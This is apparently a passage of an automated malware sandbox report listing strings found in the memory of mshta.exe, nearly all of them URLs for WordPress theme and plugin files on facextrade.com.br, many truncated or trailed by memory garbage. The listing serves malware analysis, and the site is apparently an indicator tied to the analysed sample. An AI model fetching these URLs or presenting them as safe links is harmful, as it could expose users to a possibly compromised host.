Source: mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20.2=
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20C:
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/gtranslate-style24.css?ver=4.9.20Oi
Source: mshta.exe, 00000008.00000002.1178330848.0000000005407000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/gtranslate/switcher.png
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=2.9.2ii
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172304935.0000000003A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets//lib/owl/assets/owl.theme.d
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/css/logo-slider-wp-public.c
Source: mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/img/next.pnghttp://facextra
Source: mshta.exe, 00000008.00000002.1178615460.00000000054AF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039289175.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1038970768.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174869500.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039338109.0000000004A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039407918.0000000004A27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/js/logo-slider-wp-public.js
Source: mshta.exe, 00000008.00000002.1172304935.0000000003A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/animate/animate-logo.cs
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/assets/owl.carousel
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/logo-slider-wp/public/assets/lib/owl/owl.carousel.js?ver
Source: mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/bootstrap/bootstrap-grid.min.cs
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/plugins/motopress-content-editor/includes/css/theme.css?ver=1.5.
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFra
Source: mshta.exe, 00000008.00000003.1061744000.0000000003804000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1093595277.0000000003804000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1093794569.0000000003807000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1061861096.0000000003807000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171474551.0000000003808000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/admin/data_management/
Source: mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/admin/data_management/q
Source: mshta.exe, 00000008.00000002.1180960373.000000000648A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0
Source: mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0(
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/bootstrap/js/bootstrap.min.js?ver=2.3.0gl
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/camera.css
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.36~
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/magnific-popup.css?ver=0.9.3C:
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.css
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.css===typf
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssar
Source: mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/css/style.cssstr
Source: mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.40ET4.0E)0=
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.42.9.2
Source: mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.44.0C;
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4?ver=2.1.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4C:
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4ET4.0E)$=
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/camera.min.js?ver=1.3.4US
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0=1.0
Source: mshta.exe, 00000008.00000002.1170406636.00000000031F0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0http://facextrade.com
Source: mshta.exe, 00000008.00000002.1171814085.000000000394D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/custom.js?ver=1.0x
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.01.0)h
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.09
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0=1.00E)
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0=1.06_pai
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0ET4.0E)
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0US
Source: mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/device.min.js?ver=1.0.0http://facextra
Source: mshta.exe, 00000008.00000003.1039289175.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1038970768.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174869500.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039338109.0000000004A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039407918.0000000004A27000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172277354.0000000003A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0&l
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.0-US
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.00E)
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.00E)Hl
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jflickrfeed.js?ver=1.019
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0#
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0.3
Source: mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jplayer.playlist.min.js?ver=2.3.0http:
Source: mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.21.2.1
Source: mshta.exe, 00000008.00000002.1177408982.00000000052D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2:29:C:
Source: mshta.exe, 00000008.00000003.1061193305.0000000002FF3000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1169795103.0000000002FF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2P
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2T=
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-1.7.2.min.js?ver=1.7.2d.min.css
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1=
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177426727.00000000052D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1?
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1M
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery-migrate-1.2.1.min.js?ver=1.2.1S
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167379438.000000000029B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0.3#
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0.3&
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.00
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.jplayer.min.js?ver=2.6.0ET4.0E)
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.magnific-popup.min.js?ver=0.9.3
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177475121.00000000052F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobile.customized.min.js
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.mobilemenu.js?ver=1.0)
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167470567.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0
Source: mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0)
Source: mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.09.20
Source: mshta.exe, 00000008.00000002.1180809282.0000000006454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/jquery.zaccordion.min.js?ver=2.1.0P
Source: mshta.exe, 00000008.00000003.1039289175.0000000004A23000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1038970768.0000000004A21000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1174869500.0000000004A28000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039338109.0000000004A25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1039407918.0000000004A27000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1167299804.0000000000287000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6-US
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.60C;
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6n.js
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6png
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/modernizr.js?ver=2.0.6ver=2.3.0
Source: mshta.exe, 00000008.00000002.1180659727.0000000006420000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1171875953.000000000395D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1177709846.000000000534C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3-US
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3.NET4.0E)
Source: mshta.exe, 00000008.00000002.1172098777.00000000039C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.30C;
Source: mshta.exe, 00000008.00000002.1167157736.000000000023E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3ET4.0C;
Source: mshta.exe, 00000008.00000003.1035827310.000000000468B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.1173969677.000000000468D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1036058154.000000000468C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://facextrade.com.br/wp-content/themes/CherryFramework/js/superfish.js?ver=1.5.3http://facextrad
